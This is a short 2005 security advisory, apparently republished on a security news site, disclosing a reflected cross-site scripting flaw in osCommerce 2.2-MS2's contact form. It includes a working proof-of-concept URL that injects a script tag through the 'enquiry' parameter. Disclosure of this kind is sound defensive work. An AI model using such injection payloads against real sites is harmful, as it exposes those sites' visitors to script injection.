Risks
Vulnerabilities
Browse by
osCommerce 2.2-MS2 Cross Site Scripting Vulnerability
16 February 2005
Bookmark and Share
From: "John Cobb" <johnc(at)nobytes.com>

Hello All,

I have discovered XSS vulnerability in: osCommerce 2.2-MS2

Authors Site: http://www.oscommerce.com/ [Example:]

XSS:

http://www.victimsite.com/contact_us.php?&name=1&email
=1&enquiry=%3C/textarea%3E%3Cscript%3Ealert('w00t');%3
C/script%3E

Result:

A nice pop up box.

[Notes:]

Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet

Regards

John Cobb

JohnC@NoBytes.com

http://www.nobytes.com


Spotlight

Black hole routing: Not a silver bullet for DDoS protection

As ISPs, hosting providers and online enterprises around the world continue suffering the effects of DDoS attacks, often the discussions that follow are, “What is the best way to defend our networks and our customers against an attack?”


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  
DON'T
MISS

Mon, Mar 2nd
    COPYRIGHT 1998-2015 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //